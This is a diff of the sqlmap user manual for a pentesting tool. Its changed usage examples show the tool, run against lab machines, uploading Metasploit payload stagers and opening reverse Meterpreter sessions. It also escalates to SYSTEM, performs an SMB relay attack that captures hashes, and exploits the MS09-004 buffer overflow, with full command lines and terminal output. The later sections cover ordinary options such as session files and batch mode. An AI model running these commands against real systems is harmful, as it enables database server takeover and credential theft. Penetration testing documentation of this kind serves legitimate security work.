-[hh:mm:43] [INFO] failed to compress the file because you provided a Metasploit version 
-above 3.3-dev revision 6681. This will not inficiate the correct execution of sqlmap. 
-It might only slow down a bit the execution of sqlmap
-[hh:mm:43] [INFO] uploading payload stager to 'C:/WINDOWS/Temp/sqlmapmsfgcpge.exe'
-[hh:mm:44] [INFO] running Metasploit Framework 3 command line interface locally, wait..
-[hh:mm:44] [INFO] running Metasploit Framework 3 payload stager remotely, wait..
+which is the local address? [172.16.213.1] 
+which local port number do you want to use? [47776] 
+which payload do you want to use?
+[1] Meterpreter (default)
+[2] Shell
+[3] VNC
+> 1
+[hh:mm:55] [INFO] creation in progress .............................................. done
+[hh:mm:41] [INFO] running Metasploit Framework 3 command line interface locally, wait..
 [*] Please wait while we load the module tree...
-[*] Started bind handler
+[*] Started reverse handler on 172.16.213.1:47776 
 [*] Starting the payload handler...
-[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
-[*] Sending stage (718336 bytes)
-[*] Meterpreter session 1 opened (192.168.1.161:47832 -> 172.16.213.131:61588)
+[hh:mm:22] [INFO] running Metasploit Framework 3 shellcode remotely via UDF 'sys_bineval', wait..
+[*] Sending stage (748032 bytes)
+[*] Meterpreter session 1 opened (172.16.213.1:47776 -> 172.16.213.128:2176)
 
+meterpreter > Loading extension espia...success.
+meterpreter > Loading extension incognito...success.
 meterpreter > Loading extension priv...success.
-meterpreter > getuid
-Server username: NT AUTHORITY\SYSTEM
+meterpreter > Loading extension sniffer...success.
+meterpreter > Computer: W2K3DEV
+OS      : Windows .NET Server (Build 3790, Service Pack 2).
+Arch    : x86
+Language: en_US
+meterpreter > Server username: NT AUTHORITY\SYSTEM
 meterpreter > ipconfig
 
 MS TCP Loopback interface
@@ -4750,79 +4839,76 @@ Netmask     : 255.0.0.0
 
 
 
-VMware Accelerated AMD PCNet Adapter
-Hardware MAC: 00:0c:29:29:ee:86
-IP Address  : 172.16.213.131
+VMware Accelerated AMD PCNet Adapter #2
+Hardware MAC: 00:0c:29:86:69:1b
+IP Address  : 172.16.213.128
 Netmask     : 255.255.255.0
 
 
-meterpreter > pwd
-C:\Program Files\MySQL\MySQL Server 5.0\Data
 meterpreter > exit
+
+[hh:mm:52] [INFO] cleaning up the database management system
+do you want to remove UDF 'sys_bineval'? [Y/n] 
+do you want to remove UDF 'sys_exec'? [Y/n] 
+[hh:mm:54] [INFO] database management system cleanup finished
+[hh:mm:54] [WARNING] remember that UDF dynamic-link library files and Metasploit related 
+files in the temporary folder saved on the file system can only be deleted manually
 
 
 
        
 By default MySQL on Windows runs as SYSTEM, however PostgreSQL
-run as a low-privileged user postgres on both Windows and Linux.
+runs as a low-privileged user postgres on both Windows and Linux.
 Microsoft SQL Server 2000 by default runs as SYSTEM, whereas
 Microsoft SQL Server 2005 and 2008 run most of the times as NETWORK
 SERVICE and sometimes as LOCAL SERVICE.
 
-It is possible to provide sqlmap with the --priv-esc option to
-abuse Windows access tokens and escalate privileges to SYSTEM
-within the Meterpreter session created if the underlying operating system
-is not patched against Microsoft Security Bulletin
-.
-sqlmap performs the
-
-technique by uploading 
-local exploit and using it to call the Metasploit's payload stager
-executable. sqlmap uses also the Metasploit's Meterpreter
-
-extension to abused Windows access tokens in conjunction to Churrasco
-stand-alone exploit if the user wants so.
-
-
        
-Note that this feature is not supported by sqlmap installed from the
-DEB package because it relies on Churrasco, which is not explicitly free
-software, so it has not been included in the package.
-
-
        
-This technique is detailed in white paper
-.
+It is possible to provide sqlmap with the --priv-esc
+option to perform a database process' user privilege escalation
+via Metasploit's getsystem command which include, among others,
+the  technique () or via  by using either Meterpreter's
+ extension or 
+() stand-alone executable as per user's choice.
 
 
        
 Example on a Microsoft SQL Server 2005 Service Pack 0 running as
 NETWORK SERVICE on the target:
 
 
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/iis/get_str2.asp?name=luther" \
+$ python sqlmap.py -u "http://172.16.213.128/sqlmap/mssql/iis/get_int.asp?id=1" \
   --os-pwn -v 1 --msf-path /home/inquis/software/metasploit --priv-esc
 
 [...]
-[hh:mm:17] [INFO] the back-end DBMS is Microsoft SQL Server
 web server operating system: Windows 2000
 web application technology: ASP.NET, Microsoft IIS 6.0, ASP
 back-end DBMS: Microsoft SQL Server 2005
 
-[hh:mm:17] [INFO] testing stacked queries support on parameter 'name'
-[hh:mm:22] [INFO] the web application supports stacked queries on parameter 'name'
-[hh:mm:22] [INFO] testing if current user is DBA
-[hh:mm:22] [INFO] retrieved: 1
-[hh:mm:23] [INFO] checking if xp_cmdshell extended procedure is available, wait..
-[hh:mm:29] [INFO] xp_cmdshell extended procedure is available
-[hh:mm:29] [INFO] creating Metasploit Framework 3 payload stager
+[hh:mm:47] [INFO] testing stacked queries support on parameter 'id'
+[hh:mm:52] [INFO] the web application supports stacked queries on parameter 'id'
+[hh:mm:52] [INFO] testing if current user is DBA
+[hh:mm:52] [INFO] retrieved: 1
+[hh:mm:52] [INFO] checking if xp_cmdshell extended procedure is available, wait..
+[hh:mm:01] [INFO] xp_cmdshell extended procedure is available
+[hh:mm:01] [INFO] creating Metasploit Framework 3 payload stager
 which connection type do you want to use?
-[1] Bind TCP (default)
-[2] Bind TCP (No NX)
-[3] Reverse TCP
-[4] Reverse TCP (No NX)
-> 3
-which is the local address? [192.168.1.161] 
-which local port numer do you want to use? [61499] 
-[hh:mm:54] [INFO] forcing Metasploit payload to Meterpreter because it is the only payload 
-that can be used to abuse Windows Impersonation Tokens via Meterpreter 'incognito' 
-extension to privilege escalate
+[1] Reverse TCP: Connect back from the database host to this machine (default)
+[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports 
+between the specified and 65535
+[3] Bind TCP: Listen on the database host for a connection
+> 1
+which is the local address? [172.16.213.1] 
+which local port number do you want to use? [44780] 
+[hh:mm:52] [INFO] forcing Metasploit payload to Meterpreter because it is the only payload 
+that can be used to escalate privileges, either via 'incognito' extension or via 
+'getsystem' command
 which payload encoding do you want to use?
 [1] No Encoder
 [2] Alpha2 Alphanumeric Mixedcase Encoder
@@ -4838,39 +4924,35 @@ which payload encoding do you want to use?
 [12] Alpha2 Alphanumeric Unicode Mixedcase Encoder
 [13] Alpha2 Alphanumeric Unicode Uppercase Encoder
 > 
-[hh:mm:58] [INFO] creation in progress .................. done
-[hh:mm:16] [INFO] compression in progress . quit unexpectedly with return code 1
-[hh:mm:17] [INFO] failed to compress the file because you provided a Metasploit version 
-above 3.3-dev revision 6681. This will not inficiate the correct execution of sqlmap. 
-It might only slow down a bit the execution of sqlmap
-[hh:mm:17] [INFO] uploading payload stager to 'C:/WINDOWS/Temp/sqlmapmsfyahls.exe'
-[hh:mm:20] [WARNING] often Microsoft SQL Server 2005 runs as Network Service which has no 
-Windows Impersonation Tokens within all threads, this makes Meterpreter's incognito 
-extension to fail to list tokens
+[hh:mm:53] [INFO] creation in progress ..... done
+[hh:mm:58] [INFO] compression in progress . done
+[hh:mm:59] [INFO] uploading payload stager to 'C:/WINDOWS/Temp/tmpmqyws.exe'
 do you want sqlmap to upload Churrasco and call the Metasploit payload stager as its 
-argument so that it will be started as SYSTEM? [Y/n] y
-[hh:mm:36] [INFO] the binary file is bigger than 65280 bytes. sqlmap will split it into 
-chunks, upload them and recreate the original file out of the binary chunks server-side, 
-wait..
-[hh:mm:22] [INFO] file chunk 1 written
-[hh:mm:06] [INFO] file chunk 2 written
-[hh:mm:06] [INFO] running Metasploit Framework 3 command line interface locally, wait..
+argument so that it will be started as SYSTEM? [y/N] 
+[hh:mm:22] [INFO] running Metasploit Framework 3 command line interface locally, wait..
 [*] Please wait while we load the module tree...
-[*] Handler binding to LHOST 0.0.0.0
-[*] Started reverse handler
+[*] Started reverse handler on 172.16.213.1:44780 
 [*] Starting the payload handler...
 [hh:mm:31] [INFO] running Metasploit Framework 3 payload stager remotely, wait..
-[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
-[*] Sending stage (718336 bytes)
-[*] Meterpreter session 1 opened (192.168.1.161:61499 -> 192.168.1.131:3221)
+[*] Sending stage (748032 bytes)
+[*] Meterpreter session 1 opened (172.16.213.1:44780 -> 172.16.213.128:2185)
 
 meterpreter > 
-[hh:mm:01] [INFO] loading Meterpreter 'incognito' extension and displaying the list of 
-Access Tokens availables. Choose which user you want to impersonate by using incognito's 
-command 'impersonate_token'
-Loading extension priv...success.
+[hh:mm:34] [INFO] trying to escalate privileges using Meterpreter 'getsystem' command which 
+tries different techniques, including kitrap0d
+[hh:mm:34] [INFO] displaying the list of Access Tokens availables. Choose which user you 
+want to impersonate by using incognito's command 'impersonate_token' if 'getsystem' did not 
+success to elevate privileges
+Loading extension espia...success.
 meterpreter > Loading extension incognito...success.
-meterpreter > Server username: NT AUTHORITY\SYSTEM
+meterpreter > Loading extension priv...success.
+meterpreter > Loading extension sniffer...success.
+meterpreter > Computer: W2K3DEV
+OS      : Windows .NET Server (Build 3790, Service Pack 2).
+Arch    : x86
+Language: en_US
+meterpreter > Server username: NT AUTHORITY\NETWORK SERVICE
+meterpreter > ...got system (via technique 4).
 meterpreter > 
 Delegation Tokens Available
 ========================================
@@ -4878,16 +4960,34 @@ NT AUTHORITY\LOCAL SERVICE
 NT AUTHORITY\NETWORK SERVICE
 NT AUTHORITY\SYSTEM
 W2K3DEV\Administrator
-W2K3DEV\IUSR_WIN2003
+W2K3DEV\IUSR_W2K3STENSP0
 W2K3DEV\postgres
 
 Impersonation Tokens Available
 ========================================
 NT AUTHORITY\ANONYMOUS LOGON
 
+meterpreter > Server username: NT AUTHORITY\SYSTEM
+meterpreter > ipconfig
+
+MS TCP Loopback interface
+Hardware MAC: 00:00:00:00:00:00
+IP Address  : 127.0.0.1
+Netmask     : 255.0.0.0
+
+
+
+VMware Accelerated AMD PCNet Adapter #2
+Hardware MAC: 00:0c:29:86:69:1b
+IP Address  : 172.16.213.128
+Netmask     : 255.255.255.0
+
+
 meterpreter > getuid
 Server username: NT AUTHORITY\SYSTEM
 meterpreter > exit
+
+[hh:mm:52] [INFO] cleaning up the database management system
 
 
 
@@ -4897,31 +4997,30 @@ meterpreter > exit
 Options: --os-smbrelay, --priv-esc and --msf-path
 
 
        
-If the back-end database management system runs as Administrator
-and the underlying operating system is not patched against Microsoft
-Security Bulletin ,
-sqlmap can abuse the universal naming convention (UNC) supported within
-all database management systems to force the database server to initiate a
-SMB connection with the attacker host, then perform a SMB authentication
-relay attack in order to establish a high-privileged out-of-band TCP
-stateful channel between the attacker host and the target database
-server.
+If the back-end database management system runs on Windows as
+Administrator and the system is not patched against Microsoft
+Security Bulletin , sqlmap can abuse the universal naming convention (UNC)
+feature within any database management system to force the database server
+to initiate a SMB connection with the attacker host, then perform a SMB
+authentication relay attack in order to establish a high-privileged
+out-of-band TCP stateful channel between the attacker host and
+the target database server.
 sqlmap relies on 's SMB relay exploit to perform this attack, so you need
-to have it already on your system - it's free and can be downloaded from the
-homepage.
-You need to run sqlmap as root user if you want to perform a SMB
-relay attack because it will need to listen on a user-specified SMB TCP
-port for incoming connection attempts.
+name="Metasploit">'s SMB relay exploit to perform this attack.
+You need to run sqlmap as a privileged user (e.g. root) if you
+want to perform a SMB relay attack because it will need to listen on a
+user-specified SMB TCP port for incoming connection attempts.
 
 
        
-Note that this feature is not supported by sqlmap running on Windows platform
-because Metasploit's msfconsole and msfcli are not supported on the native
-Windows Ruby interpreter.
+Note that this feature is not supported by sqlmap running on Windows
+platform because it relies on Metasploit's msfpayload which is
+not fully working on Windows.
 
 
        
-This technique is detailed in white paper
-.
+This technique is detailed in the white paper
+.
 
 
        
 Example on a Microsoft SQL Server 2005 Service Pack 0 running as
@@ -4948,8 +5047,8 @@ send the NTLM session hash when connecting to a SMB service
 [3] Reverse TCP
 [4] Reverse TCP (No NX)
 > 1
-[hh:mm:16] [INFO] which is the local address? [192.168.1.161] 192.168.1.161
-[hh:mm:16] [INFO] which is the back-end DBMS address? [192.168.1.131] 192.168.1.131
+[hh:mm:16] [INFO] which is the local address? [172.16.213.161] 172.16.213.161
+[hh:mm:16] [INFO] which is the back-end DBMS address? [172.16.213.131] 172.16.213.131
 [hh:mm:16] [INFO] which remote port numer do you want to use? [4907] 4907
 [hh:mm:16] [INFO] which payload do you want to use?
 [1] Reflective Meterpreter (default)
@@ -4980,27 +5079,27 @@ send the NTLM session hash when connecting to a SMB service
        =[ 168 aux
 
 resource> use windows/smb/smb_relay
-resource> set SRVHOST 192.168.1.161
-SRVHOST => 192.168.1.161
+resource> set SRVHOST 172.16.213.161
+SRVHOST => 172.16.213.161
 resource> set SRVPORT 139
 SRVPORT => 139
 resource> set PAYLOAD windows/meterpreter/bind_tcp
 PAYLOAD => windows/meterpreter/bind_tcp
 resource> set LPORT 4907
 LPORT => 4907
-resource> set RHOST 192.168.1.131
-RHOST => 192.168.1.131
+resource> set RHOST 172.16.213.131
+RHOST => 172.16.213.131
 resource> exploit
 [*] Exploit running as background job.
 msf exploit(smb_relay) > 
 [*] Started bind handler
 [*] Server started.
-[*] Received 192.168.1.131:3242 \ LMHASH:00 NTHASH: OS:Windows Server 2003 3790 
+[*] Received 172.16.213.131:3242 \ LMHASH:00 NTHASH: OS:Windows Server 2003 3790 
 Service Pack 2 LM:
-[*] Sending Access Denied to 192.168.1.131:3242 \
-[*] Received 192.168.1.131:3242 W2K3DEV\Administrator LMHASH:FOO NTHASH:BAR OS:Windows 
+[*] Sending Access Denied to 172.16.213.131:3242 \
+[*] Received 172.16.213.131:3242 W2K3DEV\Administrator LMHASH:FOO NTHASH:BAR OS:Windows 
 Server 2003 3790 Service Pack 2 LM:
-[*] Authenticating to 192.168.1.131 as W2K3DEV\Administrator...
+[*] Authenticating to 172.16.213.131 as W2K3DEV\Administrator...
 [*] AUTHENTICATED as W2K3DEV\Administrator...
 [*] Connecting to the ADMIN$ share...
 [*] Regenerating the payload...
@@ -5015,26 +5114,26 @@ Server 2003 3790 Service Pack 2 LM:
 [*] Removing the service...
 [*] Closing service handle...
 [*] Deleting \wELRmcmd.exe...
-[*] Sending Access Denied to 192.168.1.131:3242 W2K3DEV\Administrator
+[*] Sending Access Denied to 172.16.213.131:3242 W2K3DEV\Administrator
 [*] Transmitting intermediate stager for over-sized stage...(216 bytes)
-[*] Received 192.168.1.131:3244 \ LMHASH:00 NTHASH: OS:Windows Server 2003 3790 
+[*] Received 172.16.213.131:3244 \ LMHASH:00 NTHASH: OS:Windows Server 2003 3790 
 Service Pack 2 LM:
-[*] Sending Access Denied to 192.168.1.131:3244 \
-[*] Received 192.168.1.131:3244 W2K3DEV\Administrator LMHASH:FOO NTHASH:BAR OS:Windows 
+[*] Sending Access Denied to 172.16.213.131:3244 \
+[*] Received 172.16.213.131:3244 W2K3DEV\Administrator LMHASH:FOO NTHASH:BAR OS:Windows 
 Server 2003 3790 Service Pack 2 LM:
-[*] Authenticating to 192.168.1.131 as W2K3DEV\Administrator...
+[*] Authenticating to 172.16.213.131 as W2K3DEV\Administrator...
 [*] AUTHENTICATED as W2K3DEV\Administrator...
-[*] Ignoring request from 192.168.1.131, attack already in progress.
-[*] Sending Access Denied to 192.168.1.131:3244 W2K3DEV\Administrator
+[*] Ignoring request from 172.16.213.131, attack already in progress.
+[*] Sending Access Denied to 172.16.213.131:3244 W2K3DEV\Administrator
 [*] Sending stage (718336 bytes)
-[*] Meterpreter session 1 opened (192.168.1.161:51813 -> 192.168.1.131:4907)
+[*] Meterpreter session 1 opened (172.16.213.161:51813 -> 172.16.213.131:4907)
 
 Active sessions
 ===============
 
   Id  Description  Tunnel                                       
   --  -----------  ------                                       
-  1   Meterpreter  192.168.1.161:51813 -> 192.168.1.131:4907  
+  1   Meterpreter  172.16.213.161:51813 -> 172.16.213.131:4907  
 
 msf exploit(smb_relay) > [*] Starting interaction with 1...
 
@@ -5050,72 +5149,67 @@ msf exploit(smb_relay) > exit
 
 
 
-Stored procedure buffer overflow exploitation
+Database stored procedure heap-based buffer overflow exploit
 
 
        
 Options: --os-bof, --priv-esc and --msf-path
 
 
        
-If the back-end database management system is not patched against Microsoft
-Security Bulletin ,
-sqlmap can exploit the heap-based buffer overflow affecting
-sp_replwritetovarbin stored procedure in order to establish an
-out-of-band TCP stateful channel between the attacker host and the
-target database server.
+If the back-end database management system is Microsoft SQL Server not
+patched against Microsoft Security Bulletin
+, sqlmap can exploit the heap-based buffer overflow
+affecting sp_replwritetovarbin stored procedure in order to
+establish an out-of-band TCP stateful channel between the
+attacker host and the target database server.
 sqlmap has its own exploit to trigger the vulnerability, but it relies on
  to
-generate the shellcode used within the exploit, so you need to have it
-already on your system - it's free and can be downloaded from the homepage.
+generate the shellcode used within the exploit.
 
 
        
-Note that this feature is not supported by sqlmap running on Windows platform
-because Metasploit's msfconsole and msfcli are not supported on the native
-Windows Ruby interpreter.
+Note that this feature is not supported by sqlmap running on Windows
+platform because it relies on Metasploit's msfcli which is not
+available for Windows.
 
 
        
-This technique is detailed in white paper
-.
+This technique is detailed in the white paper
+ and in the
+slide deck .
 
 
        
 Example on a Microsoft SQL Server 2005 Service Pack 0 target:
 
 
-$ sudo python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/iis/get_str2.asp?name=luther" \
-  --os-bof -v 1 --msf-path /home/inquis/software/metasploit
+$ python sqlmap.py -u http://172.16.213.128/sqlmap/mssql/iis/get_int.asp?id=1 \
+  --os-bof -v 1 --msf-path ~/software/metasploit
 
 [...]
-[hh:mm:09] [INFO] the back-end DBMS is Microsoft SQL Server
-web server operating system: Windows 2000
 web application technology: ASP.NET, Microsoft IIS 6.0, ASP
 back-end DBMS: Microsoft SQL Server 2005
 
-[hh:mm:09] [INFO] testing stacked queries support on parameter 'name'
-[hh:mm:14] [INFO] the web application supports stacked queries on parameter 'name'
-[hh:mm:14] [INFO] going to exploit the Microsoft SQL Server 2005 'sp_replwritetovarbin' 
+[hh:mm:51] [INFO] testing stacked queries support on parameter 'id'
+[hh:mm:56] [INFO] the web application supports stacked queries on parameter 'id'
+[hh:mm:56] [INFO] going to exploit the Microsoft SQL Server 2005 'sp_replwritetovarbin' 
 stored procedure heap-based buffer overflow (MS09-004)
-[hh:mm:14] [INFO] fingerprinting the back-end DBMS operating system version and service pack
-[hh:mm:14] [INFO] retrieved: 1
-[hh:mm:15] [INFO] retrieved: 1
-[hh:mm:15] [INFO] the back-end DBMS operating system is Windows 2003 Service Pack 2
-[hh:mm:15] [INFO] testing if current user is DBA
-[hh:mm:15] [INFO] retrieved: 1
-[hh:mm:15] [INFO] checking if xp_cmdshell extended procedure is available, wait..
-[hh:mm:21] [INFO] xp_cmdshell extended procedure is available
-[hh:mm:21] [INFO] creating Metasploit Framework 3 multi-stage shellcode for the exploit
+[hh:mm:56] [INFO] fingerprinting the back-end DBMS operating system version and service pack
+[hh:mm:56] [INFO] retrieved: 1
+[hh:mm:58] [INFO] retrieved: 1
+[hh:mm:58] [INFO] the back-end DBMS operating system is Windows 2003 Service Pack 2
+[hh:mm:58] [INFO] creating Metasploit Framework 3 multi-stage shellcode 
 which connection type do you want to use?
-[1] Bind TCP (default)
-[2] Bind TCP (No NX)
-[3] Reverse TCP
-[4] Reverse TCP (No NX)
+[1] Reverse TCP: Connect back from the database host to this machine (default)
+[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports 
+between the specified and 65535
+[3] Bind TCP: Listen on the database host for a connection
 > 
-which is the back-end DBMS address? [192.168.1.131] 
-which remote port numer do you want to use? [39391] 62719
+which is the local address? [172.16.213.1] 
+which local port number do you want to use? [21380] 
 which payload do you want to use?
-[1] Reflective Meterpreter (default)
-[2] PatchUp Meterpreter (only from Metasploit development revision 6742)
-[3] Shell
-[4] Reflective VNC
-[5] PatchUp VNC (only from Metasploit development revision 6742)
+[1] Meterpreter (default)
+[2] Shell
+[3] VNC
 > 
 which payload encoding do you want to use?
 [1] No Encoder
@@ -5132,25 +5226,39 @@ which payload encoding do you want to use?
 [12] Alpha2 Alphanumeric Unicode Mixedcase Encoder
 [13] Alpha2 Alphanumeric Unicode Uppercase Encoder
 > 
-[hh:mm:50] [INFO] creation in progress .................. done
-[hh:mm:08] [INFO] handling DEP
-[hh:mm:08] [INFO] the back-end DBMS underlying operating system supports DEP: going to 
-handle it
-[hh:mm:08] [INFO] checking DEP system policy
-[hh:mm:09] [INFO] retrieved: OPTIN
-[hh:mm:12] [INFO] only Windows system binaries are covered by DEP by default
-[hh:mm:12] [INFO] running Metasploit Framework 3 command line interface locally, wait..
-[hh:mm:12] [INFO] triggering the buffer overflow vulnerability, wait..
+[hh:mm:16] [INFO] creation in progress .... done
+[hh:mm:20] [INFO] running Metasploit Framework 3 command line interface locally, wait..
 [*] Please wait while we load the module tree...
-[*] Started bind handler
+[*] Started reverse handler on 172.16.213.1:21380 
 [*] Starting the payload handler...
-[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
-[*] Sending stage (718336 bytes)
-[*] Meterpreter session 1 opened (192.168.1.161:33765 -> 192.168.1.131:62719)
+[hh:mm:27] [INFO] triggering the buffer overflow vulnerability, wait..
+[*] Sending stage (748032 bytes)
+[*] Meterpreter session 1 opened (172.16.213.1:21380 -> 172.16.213.128:12062)
 
+meterpreter > Loading extension espia...success.
+meterpreter > Loading extension incognito...success.
 meterpreter > Loading extension priv...success.
-meterpreter > getuid
-Server username: NT AUTHORITY\NETWORK SERVICE
+meterpreter > Loading extension sniffer...success.
+meterpreter > Computer: W2K3DEV
+OS      : Windows .NET Server (Build 3790, Service Pack 2).
+Arch    : x86
+Language: en_US
+meterpreter > Server username: NT AUTHORITY\NETWORK SERVICE
+meterpreter > ipconfig
+
+MS TCP Loopback interface
+Hardware MAC: 00:00:00:00:00:00
+IP Address  : 127.0.0.1
+Netmask     : 255.0.0.0
+
+
+
+VMware Accelerated AMD PCNet Adapter #2
+Hardware MAC: 00:0c:29:86:69:1b
+IP Address  : 172.16.213.128
+Netmask     : 255.255.255.0
+
+
 meterpreter > exit
 
 
@@ -5161,64 +5269,82 @@ meterpreter > exit
 
 
        
 Option: --reg-read
-#TODO
+
+
        
+TODO
 
 
 Write a Windows registry key value data
 
 
        
 Option: --reg-add
-#TODO
+
+
        
+TODO
 
 
 Delete a Windows registry key value
 
 
        
 Option: --reg-del
-#TODO
+
+
        
+TODO
 
 
 Windows registry key
 
 
        
 Option: --reg-key
-#TODO
+
+
        
+TODO
 
 
 Windows registry key value
 
 
        
 Option: --reg-value
-#TODO
+
+
        
+TODO
 
 
 Windows registry key value data
 
 
        
 Option: --reg-data
-#TODO
+
+
        
+TODO
 
 
 Windows registry key value type
 
 
        
 Option: --reg-type
-#TODO
+
+
        
+TODO
 
 
 Miscellaneous
 
-Save and resume all data retrieved on a session file
+Session file: save and resume all data retrieved
 
 
        
 Option: -s
 
 
        
-It is possible to log all queries and their output into a text file while
+By default sqlmap logs all queries and their output into a text file while
 performing whatever request, both in blind SQL injection and in inband SQL
 injection.
 This is useful if you stop the injection and resume it after some time.
 
+
        
+The default session file is output/hostname/session, but you can
+change its path with the -s option.
+
 
        
 Example on a PostgreSQL 8.3.5 target:
 
@@ -5310,11 +5436,13 @@ banner:    'PostgreSQL 8.3.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real
 Option: --flush-session
 
 
        
-As you are already familiar with the concept of a session file from description
-of option -s, it's good to know that you can flush the content of that 
-same file using option --flush-session. In that way you can
-avoid caching mechanisms implemented in sqlmap. Other possible way is the 
-manual removing of session file(s) from output directory.
+As you are already familiar with the concept of a session file from the
+description of option -s, it is good to know that you can flush
+the content of that same file using option --flush-session.
+This way you can avoid caching mechanisms implemented by default in
+sqlmap. Other possible way is the manual removing of session file(s),
+sqlmap.log in the example above, or the default
+output/hostname/session if -s is not provided.
 
 
 Estimated time of arrival
@@ -5387,13 +5515,13 @@ then estimates the time of arrival, shows the progress in percentage and
 counts the number of retrieved query output characters.
 
 
-Use google dork results from specified page number
+Use Google dork results from specified page number
 
 
        
 Option: --gpage
 
 
        
-Default sqlmap behavior with option -g is to do a google
+Default sqlmap behavior with option -g is to do a Google
 search and use resulting urls from first (100) result page for further 
 sql injection testing. In combination with this option you can specify
 some other page other than the first one for retrieving target urls.
@@ -5407,14 +5535,15 @@ $ python sqlmap.py -g "ext:php login" --gpage 3 -v 1
 
 [hh:mm:14] [INFO] first request to Google to get the session cookie
 [hh:mm:14] [INFO] using Google result page #3
-[hh:mm:14] [INFO] sqlmap got 100 results for your Google dork expression, 89 of them are testable targets
+[hh:mm:14] [INFO] sqlmap got 100 results for your Google dork expression, 89 of them are 
+testable targets
 [hh:mm:15] [INFO] sqlmap got a total of 89 targets
 url 1:
 GET http://www.XXX.com/index.php?pageid=login
 do you want to test this url? [Y/n/q]
 > y
 [hh:mm:17] [INFO] testing url http://www.XXX.com/index.php?pageid=login
-[hh:mm:17] [INFO] using '/home/inquis/software/sqlmap/subversion/trunk/sqlmap/output/www.XXX.com/session' as session file
+[hh:mm:17] [INFO] using '/home/inquis/sqlmap/output/www.XXX.com/session' as session file
 [hh:mm:17] [INFO] testing connection to the target url
 [hh:mm:17] [INFO] testing if the url is stable, wait a few seconds
 [hh:mm:19] [INFO] url is stable
@@ -5427,14 +5556,14 @@ do you want to test this url? [Y/n/q]
 
 
 
-Update sqlmap
+Update sqlmap
 
 
        
 Option: --update
 
 
        
-Using this option you can update the program to the latest version 
-directly from source repository together with the latest 
+Using this option you can update the program to the latest version
+directly from the Subversion repository along with the latest
 Microsoft SQL Server XML versions file from Chip Andrews'
 .
@@ -5444,14 +5573,19 @@ $ python sqlmap.py --update
 
 [...]
 [hh:mm:27] [INFO] updating sqlmap to latest development version from the subversion repository
-[hh:mm:28] [INFO] updated to the latest revision 1356
+[hh:mm:28] [INFO] updated to the latest revision XXXX
 [hh:mm:29] [INFO] updating Microsoft SQL Server XML versions file
 [hh:mm:33] [INFO] no new Microsoft SQL Server versions since the last update
 [...]
 
 
+
        
+The Debian and Red Hat installation packages (deb and rpm) as well as the
+Windows binary package (exe) can not be used to update sqlmap. You need
+a source package (gzip, bzip2 or zip) to use this feature.
 
-Save options on a configuration INI file
+
+Save options in a configuration INI file
 
 
        
 Option: --save
@@ -5467,7 +5601,7 @@ Example on a PostgreSQL 8.3.5 target:
 $ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" -b \
   -v 1 --save
 
-[hh:mm:33] [INFO] saved command line options on '/software/sqlmap/sqlmap-SAUbs.conf' 
+[hh:mm:33] [INFO] saved command line options on '/home/inquis/sqlmap/sqlmap-SAUbs.conf' 
 configuration file
 [hh:mm:33] [INFO] testing connection to the target url
 [hh:mm:33] [INFO] testing if the url is stable, wait a few seconds
@@ -5597,13 +5731,12 @@ timesec = 5
 
        
 The file is a valid sqlmap configuration INI file.
 You can edit the configuration options as you wish and pass it to sqlmap
-with the -c option as explained above in section 5.2:
+with the -c option as explained above in section 5.2.5:
 
 
-$ python sqlmap.py -c "sqlmap-SAUbs.conf"
+$ python sqlmap.py -c sqlmap-SAUbs.conf
 
 [...]
-
 banner:    'PostgreSQL 8.3.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real 
 (Ubuntu 4.3.2-1ubuntu11) 4.3.2'
 
@@ -5615,8 +5748,8 @@ banner:    'PostgreSQL 8.3.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real
 Option: --batch
 
 
        
-If you want sqlmap to run as a batch tool, without any users interaction 
-when a choice has to be done, you can force it by using --batch
+If you want sqlmap to run as a batch tool, without any user's interaction 
+when sqlmap requires it, you can force it by using --batch
 option, and leave sqlmap to go for a default behaviour.
 
 
        
@@ -5626,6 +5759,7 @@ Example on a MySQL 5.0.67 target:
 $ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int_str.php?id=1&name=luther" \
   --batch -v 1
 
+[...]
 [hh:mm:22] [INFO] testing if GET parameter 'id' is dynamic
 [hh:mm:22] [INFO] confirming that GET parameter 'id' is dynamic
 [hh:mm:22] [INFO] GET parameter 'id' is dynamic
@@ -5654,19 +5788,19 @@ back-end DBMS:	MySQL >= 5.0.0
 
 
 
        
-As you can see, sqlmap by default automatically chooses to inject payload 
-to the first vulnerable parameter.
+As you can see, sqlmap by default chose the injection payload to the first
+vulnerable parameter.
 
 
-Clean up the DBMS by sqlmap specific UDF and tables
+Cleanup the DBMS by sqlmap specific UDF(s) and table(s)
 
 
        
 Option: --cleanup
 
 
        
 It is recommended to clean up the back-end database management system from
-sqlmap temporary tables and created user-defined functions when you are
-done with owning the underlying operating system or file system.
+sqlmap temporary table(s) and created user-defined function(s) when you
+are done with owning the underlying operating system or file system.
 
 
        
 Example on a PostgreSQL 8.3.5 target: